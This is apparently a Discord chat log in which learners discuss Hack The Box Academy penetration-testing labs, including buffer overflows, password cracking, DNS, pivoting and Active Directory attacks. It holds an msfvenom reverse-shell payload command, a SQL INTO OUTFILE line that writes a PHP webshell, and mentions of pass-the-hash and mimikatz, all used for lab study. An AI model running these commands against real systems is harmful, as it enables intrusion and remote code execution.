Hey guys, how are you doing? Im having problems with the final assessment from stack based bof on windows.
I already got the right buffer size, the jmp esp address and the bad char.
Somehow my exploit seems to do it well (looking on the debugger, setting a breakpoint on the JMP ESP and stepping into it looks good).
Buy I'm not getting the reverse shell on my local PC.
Someone can help me? Thank you in advance.
Exploit + details:

hey, i just had a look and you're not supposed to get a revshell... you gotta do some hunting for creds, then you can use those creds on another port

i think i always did... if it wasn't already stashed on there in a "Tools" folder or something. Haven't used the load kiwi function, so can't help there.

ty

can anyone help me on attacking common application :section IIS tilde enu part?

you can run the "Generate Wordlist" part and then "Gobuster enumeration" pretty much verbatim and it should work

ya, and i did and gave 1 output being the obvious answer and isnt accepting as correct.

@fringe shell can i dm you?

sure can

hi

anyone can help me with Password Attacks Lab - Hard in the password attack module? I'm stuck a few hours with brute force with Johanna user

which list are you using

i'm trying with password.list and mut_password.list

i think ur on the right track

but for the username have you tried lowercase

wow, i'll try

in rdp protocol?

yah

check pm

Hi friends. In this crack protected files section: https://academy.hackthebox.com/module/147/section/1322 The question asks me to log in with Kira's cracked password...are we suppose to hydra the initial access to the host? The section is about cracking protected file Idk where kira comes from.

yes I think you'll have to do hydra for the user kira first

thank you

np

please I think my DNS settings are messed up and I heard Resolv.conf is prioritized over hosts file and bcuz of this I can't do any labs with dns involved my kali version is 2023.3 this is what's in my resolv.confresolv.conf contains

Generated by NetworkManager

search localdomain
nameserver 1.1.1.1

What exactly is not working?
What do you mean by labs with DNS involved?

There is nothing unusual in your /etc/resolv.conf.

good morning, any help here please #1149245633232916510 message

I'm trying to solver attacking common services DNS

nslookup results

nslookup inlanefreight.htb
Server: 1.1.1.1
Address: 1.1.1.1#53

** server can't find inlanefreight.htb: NXDOMAIN

I altered the nameserver to 1.1.1.1 myself there was some other IP address there before and that's what inlanfreight kept mapping to

inlanefreight htb isn't a public domain

you have to use the dns server provided in the section

i added it in my etc hosts

Read the Module: We can use this Splunk package to assist us.

are you still stuck my friend ?

Why?
You can use the IP from the specified resolver.

nslookup resolves the domain name from dns servers not from /etc/hosts

what I did is xxx.xxx inlanfreight.com in y etc hosts

why you use com?

TLD = htb, right?

sorry .htb

This difference is extremely important 😉

htb is not com

been using .htb, .com just came out of my fingers subconsciously

how do I "use the IP from the specified resolver"?

Then you only have to ask the specified NameServer (Target IP) for this domain. It knows this zone.

dig www.example.tld @10.10.10.10

ok i'll do that

but what do I put in my etc hosts then?

don't think you need anything for that section

oh ok

i am working on Passwd, Shadow & Opasswd,but i can not find Will's credentials. who know where i can find Will's password

its from previous section

What exactly do you want to do with an entry in /etc/hosts?

https://en.wikipedia.org/wiki/Hosts_(file)

i have tried the password i got previous section. but it is failure

thanks a lot friend 😊 appreciate it

then you got the wrong password

I thought the system won't recognize the .htb since it's not a "real" site so I'll have to put it in etc hosts to map it to the generated IP

The system would first look in the hosts file (/etc/hosts) and then ask the defined resolver (/etc/resolv.conf).

But if you already specify the resolver in your query, then the system will ask this resolver.

I think I should use the resolver method I find it hard knowing what to put after the @

https://www.cloudflare.com/learning/dns/what-is-dns/

i found a nameserver does the system resolve that if main domain IP is already in resolve.conf?

Resolver method?
No idea what you mean. You have to ask the authoritative server (Target IP) directly in any case. Only he knows the zone and can answer you.

Of course you can reconfigure your system. But then it will ask for this host for each name resolution.
But it is not a recursive resolver and therefore cannot resolve other names than inlanefreight.htb.

oh

https://academy.hackthebox.com/module/112/section/1068

hi guys. im stuck on smth really silly. im on this module and i cant seem to figure out how they get to root @ nfs

guess it's back to the drawing board for me🤡

You just need to understand how DNS works. It's really not difficult.

That's just an example for testing

Idk how to start

I opened my desktop

and am trying to figure it out LOL

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

😮

yu

ty

Every day I stress over unimportant things 😔 thank you 🙏🏼

Literally right above it "let us create such an entry for testing purposes"

Yh I assumed they wanted us to do that

And I couldn't figure it out

Hello, I need help on module Attacking Common Applications: Exploiting Web Vulnerabilities in Thick-Client Applications

I have done follow the example but on the last part after i modify code to do sql injection I can't Login, It seems like the Login button is not working or something, I also tried to use cred from example to Login but it doesn't work too I don't know why. please help
https://academy.hackthebox.com/module/113/section/2164

This is what i modified on User.java

public User(int uid, String username, String password, String email, Role role) {
    this.uid = uid;
    this.username = username;
    this.password = password;
    this.email = email;
    this.role = role;
}
public void setPassword(String password) {
    this.password = password;
  }

Check out the Video from Ippsec
https://www.youtube.com/watch?v=3bvKLj0akMM&t=360s

you can try chaning the code to this https://0xdf.gitlab.io/2020/08/08/htb-fatty.html#admin-access

https://prnt.sc/8SA2RjjS6LzB

can someone tell me,why it doesnt ask for a password?i cant continue my fundamentals

i run this on my computer,in oracle

Anyone? 🥹

Somneone help me?why i cant establish and SSH connection from VirtualBox with ubuntu?I can only through the site's workstation?Ubuntu doesnt ask for the password and i get stuck

htp-student typo?

https://prnt.sc/8SA2RjjS6LzB

nopp

it's suppose to be htp-student@10.129.30.211?

that a typo but you got a time out error so that isn't the issue

try scanning port 22 on that machine just confirm you can connect

also read #welcome and #rules after that use /verify at #bot-commands to send screenshot here

htb* still doesnt work.didnt know,ok i ll read

I just found this video:
Guy has same script as me, just different victim IP and different LHOST IP. Somehow it's working for him and not for me. So frustrating (I know it's a part of hacking, but damn...).

you should report it not shared here it here, that's against academy TOS

I've report they said they can't help me

Really frustrating since I just transcribed this guy script (changing the victims IP and msfvenom shellcode) and it's literally the same as mine...

Anyway I've edited that message

Sorry

support said that? i'm just a bit confused they should resolve that internally because the video is just against academy TOS, nothing to do with you

I mean about my error. They didn't even look the video or my exploit

can't help right now but i'll be back when i'm free and if you still need help with that i'll give you a ping

Thank you so much.

im finding password attacks one of the more frustrating modules, i’m not sure when htb wants me to use their wordlist or rockyou or something else entirely

This is exactly what you will encounter in reality. You don't know which password list is the right one.

Any good crypto player looking for a ctf team to join?

yeah, i suppose that’s fair

read #welcome and #rules after that use /verify at #bot-commands and ask that at #general

Am I the only one who has completed several modules and feels like I don't know anything? Is this normal?

were you taking notes?

yeah

and I use it

Test your knowledge by trying a random skill assessment module

no

I was able to complete the hardest lab in the footprinting module without any help, but I still feel like I dont know anything, idk why

Try with other modules too

This rdp foot hold is ass is there anything i can do to connect my machine to access rhe rdp network this live engagement on shell and payloads

Hi. I'm having trouble configuring SELinux to deny access to a file. I have learned about compiling .te files, trying to make my custom labels, trying to reuse already used ones. Any help?

AD Enumeration & Attacks - Skills Assessment Part I - The webserver crashes trying to upload files such as chisel? Am i working in the right direction?

Are you in question 1 ? (Submit the contents of the flag.txt file on the administrator Desktop of the web server)

Im in the home stretch trying to get to the DC, i. used netsh to get this far

Not getting it clearly, so can you say which question are you trying

last question

Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

trying to get chisel on the webserver so that i can run more tools to proceed

If that is the right weay to go

Do post exploitation in svc_sql user using mimikatz and grab way to DC

They need to change this this rdp is so fking slow its making me going crazy wtf 🤬

just telling people exactly what to do in a skill assessment is pretty lame

Any hints? 👉👈

Python is rarely installed on Windows Systems. Try -f exe

Exploit is being used remotely, from my Linux PC

Oh wait, sorry. It just generates the payload as python format

Do you know if the target machine is little-endian or big-endian?

Little

That's the pack for

It enters on the JMP ESP also

Reach the padding and then the shellcode.

But I got no remote shell

# msfvenom -p 'windows/shell_reverse_tcp' LHOST=10.10.15.198 LPORT=1234 -f 'python' -b '\x00\0x0A\0x0D'

Here, why are the other bits 0x0A and 0x0D but the x00 is not 0x00?

Mmm let me check 😂😭

Bro

I might have dislexia

Thank you

No problem if it worked :D

Gonna check, but definitely it's gonna work

Hello! Can I be admin here and get paid?

absolutely not

Ok

But you are not even owner or admin or mod tho?

head over to #welcome and verify your account

this channel is for module discussion only

AD Enumeration & Attacks - Skills Assessment Part I - I have the admin ntlm hash and just need to pivot to the machine, but pivot methods keep failing

any hints to use the correct pivot method to get the final flag on the DC desktop?

Thank you so much, definitely I gotta work on my attention and problem revision skills. I'm really grateful you helped me 🙏🏼🥹

It worked 😂

yes, dm 0xjb

if you really need to contact admins just tag the serious rule breaker role

^^

I have done my fair bit of basic BOFs and I know they can be a pain with shellcode involved. Nice job :)

also true

Yeah, now I got the connection on my local nc but can't interact and then it close the connection. This shit is hard AF 😂. Going to try it tomorrow in the HTB VM.

Pass the hash in impacket-psexec with mention user and DC IP using proxychains

what proxy method would you reccomend trying on the webserver?

have you solved all pervious question ?

yes, only using netsh however, i haven't gotten a decent pivot going otherwise

i was able to use xfree to get to ms01 with that method

try tunneling in msfconsole, https://academy.hackthebox.com/module/158/section/1428.

Can I dm someone about Pivoting and Tunneling module
Rdp and Socks Tunneling with SocksOverRDp

I am unable to see if it is lab issue or skill issue

intro to Active Directory module, I am doing the lab and I cant connect to the windows server with RDP

Try to reset the target

i did it

but nothing happened

Try remmina

For rdp

its good now, thanks 😄

I got these errors with xfreeRDP

hello y'all, anyone who have completed the Attacking common services lab easy, cuz I'm stuck, I found the password to the user and got access to the website but I'm struggling to upload a webshell (I guess this is the best way to grab the flag......)

although I guess the other way is thru sql but not sure

Any examples of this going through windows? in the middle rather than linux?

hey I'm doing the medium lab for "footprinting" and I'm on the RDP part trying to connect to the database but apparently I need to run the Server Management Studio as a privileged user? I'm a little lost

I managed to solve this.
Just keep trying doing the shellcode in msfvenom, it gives with the same arguments 3 different shellcodes (using encoders because of the bad chars).
Firstone get connection to netcat but no interactive shell.
Second one didn't even get a connection.
Third one get connection and shell.

Is this normal? Gotta always try several times same arguments on msfvenom? Or I'm missing something? I've literally press up and resend the same msfvenom command.

anyone willing to help with easy lab from attacking common services..!!!

Question, in the ATTACKING COMMON APPLICATIONS module for the Exploiting Web Vulnerabilities in Thick-Client Applications box, where do they get the IP address for this command from?

echo 10.10.10.174 server.fatty.htb >> C:\Windows\System32\drivers\etc\hosts

seems like you have the credentials of the user ||alex||

which you can use to get the credentials of the server administrator

Looks like the tun0 IPs from HTB VPN. I do not have that module so I might be wrong.

Okay thank you! I will try my pwnbox IP address again

Tun0 is also in the pwnbox

It will always be the 10.10.x.x ip

Thanks for the tip. My real issue is every time I try to connect using the credentials "qtc:clarabibi" it says connection error.

No idea about that one m8

All good, thanks for responding.

anyone can give me a hint, with easy lab from attacking common services, I got access to mysql but can't find where to write the webshell, reading the forum I saw some comments regarding the possibility to write the webshell uder C:\xampp\htdocs\backdoor.php, but can't login via RDP, I'm completelly STUCK

C:\xampp\htdocs\ is the xampp webroot

ok.

Reread the attacking sql section it tells you how to do so

I read it but don't understand how to use SELECT ... INTO OUTFILE statement with LOAD_FILE() works...

I know mysql is running over Windows but can't find xampp\htdocs\ in the database unless I'm completely LOST

you dont find it in the database

review the section again about into outfile

means I can write a command direcly in the database without a path?

no

might need to take a step back and review how databases work cause you seem to have some odd misconceptions

what exactly do you recommend to review about databases?

or module to review?

just go through some mysql tutorials so you can understand the tech better

https://www.mysqltutorial.org/mysql-basics/

ok., ty

id recommend setting up your own little mysql database so you can play around with it

Hello

I need help for Authority ! Where is the password for configuration password ? I search but I don't see

this is for module discussion

read #welcome

to access the rest of the server

you could make your life easier and use sqlmap with --os-shell to get a shell

thatd defeat the point of the lesson

ty but i prefer to understand the things how works and do it manually

understanding the content and the lesson is more important than just answering the question correctly

agreed

i think you should think smarter not harder

yes and you can do that after you actually understand what youre doing

otherwise youll just get stuck as a skid forever

The point of the lesson is to learn how to do things in the event the --os-shell doesn't work

that too

And being able to actually control the commands rather than assume something works

Im like one of the biggest advocates of think smarter not harder in here, but the smarter thing is to learn what you're doing first

guys if someone can explain me why in Password attacks medium lab:

spoiler>>>>
|| I can connect from ssh as dennis and as root with same private key i really dont understand this concept i tried searching google but to no avail.||

Because Google won't really answer

||they both have the same key in their authorized keys list||

It's just shared/reused credentials

||aha so auth list holds all the keys i can get use to connect to a user ok got it Thanks man!||

||they both have the same public key in their authorized keys and have the same private keys||

ye i got it now thanks guys!

^

@thorn urchin can I DM?

busy at work

ok., no worries

ty btw

ok., @thorn urchin I understood your comment but now I got a different probem, the result of my webshell is not shown in the browser

I got this too, ty

Im doing password mutations, Im running into this error that I can't find online

ope and I cant post it

Verify your acc

#welcome

It gets stuck on that every time

nevermind

thats just the end of the file

I didnt not think it was gonna get throguh 94k words in 10 sec

I'm stuck on this as well - it's the only part I'm missing from this module :P

I was afk but now I'm back at it again, I can't find any more users on the system

you can

there’s ||sa|| credentials you just have to look 😉

net user tells me we have

Administrator            alex                     DefaultAccount
Guest                    WDAGUtilityAccount

I tried using the sa password for the admin user but that did not work for me

I reckon the @ delimits the end of the password, right?

||run ssms as admin|| then use the credentials you found

no

fvck that was the problem then

many thanks dude @lusty thicket

you’re welcome ^^

Im doing the mutations password challange, and I have done the password file they provided with the custom rule file they provided, ran everything against the ftp server and got nothing, and to make sure, I used grep aswell to look for "Pwn3d!"

do I have to change the default username to something other than "sam:

Hi everybody

i'm doing Pivoting, Tunneling and Port forwards module . screenshot of the question i'm doing. I'm having issues with running this command python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 i get this error on the pivot host machine

nvm figured it out however the flag i'm submitting says it wrong smh

what could be wrong in this command SELECT "<?php system($_REQUEST[‘cmd’]) ?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php'; .....???

Hi guys!

Am I looking at the wrong thing?

might be missing ; in your syntax after the cmd )

The answer seems like System Logging Service

got it, ty

cool. your syntax is different than mine somewhat but the ;'s are important lol

can I DM?

ok

Does this seem like a module mistake?

Got it, its Notify

can i pm someone.. im stuck in Advanced File Disclosure of Web Attacks!

Why dont you just drop your question in here, so people can see if they can help with it.

Hello! Can I get a nudge on the Documentation and Reporting Practice Lab? I've been stuck for two days on question 1. I have so many different users and passwords but none of them get me on to the DC.

Are you on the first question then?

yeah. I'm having trouble getting Domain Admin.

What have your tried?

mix and matching a bunch of different creds
usernames: asmith, abuoldercon, admin, Administrator, solarwindsmonitor, sqldev, sqlprod, dhawkins, clusteragent
passwords: Welcome1, Welcome123!, Bacon1989, diamond1

Try to think about what those creds could be used for that is not going right to the DC, use those with some other tools to enumerate more users/services.

i'll keep trying. thank you so much dude

Hey guys, I'm in module "Using Web Proxies" :: "Skills Assessment - Using Web Proxies"
Question 3:
"Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload"

I don't get what am I suppose 2 send the intruder, the request?!
if so what am I suppose 2 mark as my target??

can someone please clarify me ??

@spring tundra

??

like the question said your target is the cookie, in intruder encode the cookie as the following question and hint the Payload Processing tab

I don't understand what should I send 2 the intruder ...

the cookie is in the response ...

dms

that dumb dumb ask to be admin yesterday but didn't get meme on enough so he's here for round 2 🤣